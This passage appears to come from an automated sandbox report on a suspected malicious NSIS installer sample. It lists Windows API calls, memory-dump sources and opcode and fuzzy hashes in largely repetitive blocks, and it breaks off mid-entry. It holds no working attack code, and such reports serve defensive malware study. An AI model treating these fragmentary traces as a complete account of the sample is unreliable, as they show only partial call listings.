                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                              • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                              • API String ID: 3441113951-334447862
                                                                                                              • Opcode ID: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                              • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                              • Opcode Fuzzy Hash: 05e616f99306ff785708979dde1941866962e16d7e4638c2318d7513fcce5d93
                                                                                                              • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                              • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                              • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                              • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                              • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                              • String ID: $M$N
                                                                                                              • API String ID: 1638840714-813528018
                                                                                                              • Opcode ID: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                              • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                              • Opcode Fuzzy Hash: 31df49881469a5ecb160dedc783b3d99a93962993771a60ee7fc946c0ea1256b
                                                                                                              • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                                                                              APIs
                                                                                                              • DeleteFileW.KERNEL32(?,?,00437800,75572EE0,00000000), ref: 00405B23
                                                                                                              • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,00437800,75572EE0,00000000), ref: 00405B6B
                                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,00437800,75572EE0,00000000), ref: 00405B8E
                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,00437800,75572EE0,00000000), ref: 00405B94
                                                                                                              • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,00437800,75572EE0,00000000), ref: 00405BA4
                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                              • String ID: 0WB$\*.*
                                                                                                              • API String ID: 2035342205-351390296
                                                                                                              • Opcode ID: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                              • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                              • Opcode Fuzzy Hash: c39e99c88a1dbfea07cbdfee3447eb09e3b7895857f1840ffe404f3b8fee67f3
                                                                                                              • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                              • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                              • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                              • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,75572EE0,00405B1A,?,00437800,75572EE0), ref: 00406736
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955327559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2955306041.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955362346.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955379885.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2955439266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                              • String ID: xgB
                                                                                                              • API String ID: 2295610775-399326502
                                                                                                              • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                              • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                              • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                              • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983114946.0000000038FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FC0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_38fc0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: D
                                                                                                              • API String ID: 0-2746444292
                                                                                                              • Opcode ID: 40c2e0b9573bce813b8bd3dc8eeffd0b33e7f88b9921dfbb7a427b103efb912e
                                                                                                              • Instruction ID: fb02c3dd09897f5ce6c3491ff2a95775550d65bfa717a9bb7bf634c4a348308c
                                                                                                              • Opcode Fuzzy Hash: 40c2e0b9573bce813b8bd3dc8eeffd0b33e7f88b9921dfbb7a427b103efb912e
                                                                                                              • Instruction Fuzzy Hash: 9AC1DF78E00219CFDB54DFA4C995B9DBBB2BF89304F6085A9D809AB351DB359E81CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 99f48742e7f47460ae7e160926ff1cf23e7744d43909af98bc0a7b7464cf374d
                                                                                                              • Instruction ID: 4667a3a0a437e915a7b9fb732c212f5ee0a288ac855ccaedd463e969384b9508
                                                                                                              • Opcode Fuzzy Hash: 99f48742e7f47460ae7e160926ff1cf23e7744d43909af98bc0a7b7464cf374d
                                                                                                              • Instruction Fuzzy Hash: 6C62AC74E01228CFEB64DF69C890BDDBBB2BB89305F1085E9D409A7265DB359E81CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983114946.0000000038FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FC0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_38fc0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: da17f68d836d7e80e917dd2e55487e5d717ec2034b37e92f244cb8c7cb1f8763
                                                                                                              • Instruction ID: 2c7235b10a53350f49d8a8848c65420931c3a448d61631a6a9606c48cbf7bc35
                                                                                                              • Opcode Fuzzy Hash: da17f68d836d7e80e917dd2e55487e5d717ec2034b37e92f244cb8c7cb1f8763
                                                                                                              • Instruction Fuzzy Hash: 41C1D278E00218CFDB54DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983114946.0000000038FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FC0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_38fc0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 692c1a87297bc8962f84bc97d0480e53e2db184f388298037c72490e15f96d46
                                                                                                              • Instruction ID: 5649a0f0b9865d92ca49c8748713337e5e2c1470996690960e3f1ad8195bfed0
                                                                                                              • Opcode Fuzzy Hash: 692c1a87297bc8962f84bc97d0480e53e2db184f388298037c72490e15f96d46
                                                                                                              • Instruction Fuzzy Hash: BFC1B278E00219CFDB54DFA5C994B9DBBB2BF89300F6081A9D809AB355DB355E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983114946.0000000038FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FC0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_38fc0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2d922ba29ba18e44f9f0ccc68399531291234899e56d6d7ed3f7d7a9fb79121a
                                                                                                              • Instruction ID: 2bf5ce363f33648226cea03f6747202755b400786be570392d20ef7dcc1c45c8
                                                                                                              • Opcode Fuzzy Hash: 2d922ba29ba18e44f9f0ccc68399531291234899e56d6d7ed3f7d7a9fb79121a
                                                                                                              • Instruction Fuzzy Hash: 34C1CE74E00218CFEB54DFA5C994B9DBBB2BF89304F6081A9D809AB355DB359E81CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983114946.0000000038FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FC0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_38fc0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4270a6e540913799fb979f57e2ec2e3cb5200a4872a714348fedfcaf520325db
                                                                                                              • Instruction ID: 7e86945ffaabd32d51ee12863904933836efd36d63fedf23d4d0bc5984cf5054
                                                                                                              • Opcode Fuzzy Hash: 4270a6e540913799fb979f57e2ec2e3cb5200a4872a714348fedfcaf520325db
                                                                                                              • Instruction Fuzzy Hash: E5C1AF74E00219CFEB54DFA5C994B9DBBB2BF89300F6081A9D809AB355DB359E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983114946.0000000038FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FC0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_38fc0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bb1c2caf933d636353b2acafec410cc41e995688935ea9c930e9765e8ad2cf56
                                                                                                              • Instruction ID: 10436e71806526072e6ddd8e3bb9ab3493cce2062a24526aee0525e72fdfcced
                                                                                                              • Opcode Fuzzy Hash: bb1c2caf933d636353b2acafec410cc41e995688935ea9c930e9765e8ad2cf56
                                                                                                              • Instruction Fuzzy Hash: E6C1DE74E00218CFEB14DFA5C994B9DBBB2BF89304F6081A9D809AB355DB359E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e1c063cb739a6e3e1facf9fac28f1d9e901dfbf2d28aaaca94ba96df21523e4b
                                                                                                              • Instruction ID: aad800676b594e9d25e0f35bc7c8a2245541a469e18bbad4c90b7dbe7b53a86a
                                                                                                              • Opcode Fuzzy Hash: e1c063cb739a6e3e1facf9fac28f1d9e901dfbf2d28aaaca94ba96df21523e4b
                                                                                                              • Instruction Fuzzy Hash: B0C1C174E00218CFEB54DFA5C994B9DBBB2BF89304F6081A9D809AB355DB359E81CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 65cc09f78c60789038be186953216ddfa9fb1b99e46feec09f519bfabe46a497
                                                                                                              • Instruction ID: 3526d20a206c01cd4c3ed812e5b0a498722002267bd516fd996a382b5a755e02
                                                                                                              • Opcode Fuzzy Hash: 65cc09f78c60789038be186953216ddfa9fb1b99e46feec09f519bfabe46a497
                                                                                                              • Instruction Fuzzy Hash: 33C1C074E00218CFEB54DFA5C994B9DBBB2BF89304F6081A9D809AB355DB359E81CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f0d1ead7752156d9fb1c9bd66f4a21853a6768c1220ceb3c3c6be869ec23f282
                                                                                                              • Instruction ID: 53a2c39e78e078959f0988af78a165285f567922b10ddee9c3a31d6750055b03
                                                                                                              • Opcode Fuzzy Hash: f0d1ead7752156d9fb1c9bd66f4a21853a6768c1220ceb3c3c6be869ec23f282
                                                                                                              • Instruction Fuzzy Hash: 1BC1D274E00218CFEB54DFA5C994B9DBBB2BF89304F6081A9D809AB365DB355E81CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aaabe0148a6a914a522e68306f9bdce69cb6ebba25830274dbbe91e4be86523f
                                                                                                              • Instruction ID: 948394f675b8b0f4961971637f53a991b7a3306d564dc7d5d73e36ea3c4ec9c0
                                                                                                              • Opcode Fuzzy Hash: aaabe0148a6a914a522e68306f9bdce69cb6ebba25830274dbbe91e4be86523f
                                                                                                              • Instruction Fuzzy Hash: D9C1B074E00218CFEB14DFA9C994B9DBBB2BF89304F6081A9D809AB355DB355A85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2baa3380762d2901427a84d1872c5cf8d22d5f96b5f5cfb1eeeada4d61411f59
                                                                                                              • Instruction ID: 0cebf9e2c9227f9b1e5e7843059ca7037a6da8b29ee9ea0bb3ae9b68578ed1d7
                                                                                                              • Opcode Fuzzy Hash: 2baa3380762d2901427a84d1872c5cf8d22d5f96b5f5cfb1eeeada4d61411f59
                                                                                                              • Instruction Fuzzy Hash: 6CC1C174E00218CFEB14DFA5C994B9DBBB2BF89305F6081A9D809AB365DB355E81CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1964b5a0b9ea3bddf10b9fb935efa425195694c5005f807dd214d9277f0700b5
                                                                                                              • Instruction ID: 692a7e9ef3f20f1fad4da697bbcc9cabf817d7efbb2a4c9ce8fb36adb2b4ff2f
                                                                                                              • Opcode Fuzzy Hash: 1964b5a0b9ea3bddf10b9fb935efa425195694c5005f807dd214d9277f0700b5
                                                                                                              • Instruction Fuzzy Hash: 31C1C174E01218CFEB54DFA5C994B9DBBB2BF89300F6081A9D809AB355DB359E81CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1a8f3d559e0ae15564918c2c2332096cef400db336e6742b62d76062a6ed9d8a
                                                                                                              • Instruction ID: 822361d959ad431fed531435e543d5e7e13be993ed8fd7f1e0734271ce7c9d28
                                                                                                              • Opcode Fuzzy Hash: 1a8f3d559e0ae15564918c2c2332096cef400db336e6742b62d76062a6ed9d8a
                                                                                                              • Instruction Fuzzy Hash: 5BC1C274E00218CFEB54DFA5C954B9DBBB2BF89304F6081A9D809AB355DB359E81CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a3569831c23bc5fb21415d58ed778e5844044484a72ae2d21f34360c65e7fa4a
                                                                                                              • Instruction ID: 92e7f48f5b996a95a5e6045d8f0b7ef27f2f4a8eb22a40926958f9f540633d7a
                                                                                                              • Opcode Fuzzy Hash: a3569831c23bc5fb21415d58ed778e5844044484a72ae2d21f34360c65e7fa4a
                                                                                                              • Instruction Fuzzy Hash: 59C1D274E00218CFEB54DFA5C994B9DBBB2BF89305F6081A9D809AB355DB355E81CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c0cfd59f8434fddc722e6939240a167356a125ec1f961a95116c6765e59ebcd1
                                                                                                              • Instruction ID: dc8ba654cc17abf9cb080b1d9ed992c52fe1665a5fe1a109a325e546f2fda42a
                                                                                                              • Opcode Fuzzy Hash: c0cfd59f8434fddc722e6939240a167356a125ec1f961a95116c6765e59ebcd1
                                                                                                              • Instruction Fuzzy Hash: 00C1D174E00218CFEB54DFA5C994B9DBBB2BF89304F2081A9D809AB355DB359E85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 957bf4d56d8ebb2bef1c32f27cb98465423580b423344022474ade1100f9717d
                                                                                                              • Instruction ID: b97c1c1995bc573ddd26f142e11cd2ce8609d73b19cf3c8ee712b12347463fcb
                                                                                                              • Opcode Fuzzy Hash: 957bf4d56d8ebb2bef1c32f27cb98465423580b423344022474ade1100f9717d
                                                                                                              • Instruction Fuzzy Hash: C4C1D274E00218CFEB54DFA5C994B9DBBB2BF89304F6081A9D809AB355DB355E82CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4f84fb88d5cfb5cef9bd81cdb8bad4585735e083f69b05eadc4dfe3b8e8ef2fa
                                                                                                              • Instruction ID: 8f4e05686d0882fa10b47c814ceee24a9edad165417b1afe94080f92acb928bf
                                                                                                              • Opcode Fuzzy Hash: 4f84fb88d5cfb5cef9bd81cdb8bad4585735e083f69b05eadc4dfe3b8e8ef2fa
                                                                                                              • Instruction Fuzzy Hash: 74C1C274E00218CFEB14DFA5C994B9DBBB2BF89304F6081A9D809AB355DB355E86CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6ec6028d938d9a5d9a47cb99bc5b4a73b58a1c6d15e4ef118d9f8c332611addf
                                                                                                              • Instruction ID: 1e33986b0f81d0f34d87039593ddab03e9d5c74a1c79d5bccef30ce4ee6efdc7
                                                                                                              • Opcode Fuzzy Hash: 6ec6028d938d9a5d9a47cb99bc5b4a73b58a1c6d15e4ef118d9f8c332611addf
                                                                                                              • Instruction Fuzzy Hash: E6C1B074E00218CFEB54DFA5C994B9DBBB2AF89304F6081A9D809AB355DB359E81CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 44087a4faa741d439f31558d20500024f527ef6d112365dae85a882d762eba4d
                                                                                                              • Instruction ID: e8c1f73693911fb2be1f73c2d8450721237d9d9193e50d6f0cf44b09ccc3bc72
                                                                                                              • Opcode Fuzzy Hash: 44087a4faa741d439f31558d20500024f527ef6d112365dae85a882d762eba4d
                                                                                                              • Instruction Fuzzy Hash: 62C1D174E00218CFEB54DFA5C994B9DBBB2BF89300F2081A9D809AB355DB359E85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 819ab5a604e6e6a6ad169832c8aa35e33ffe16aa59d0f2cd19f7d1ea504bcab0
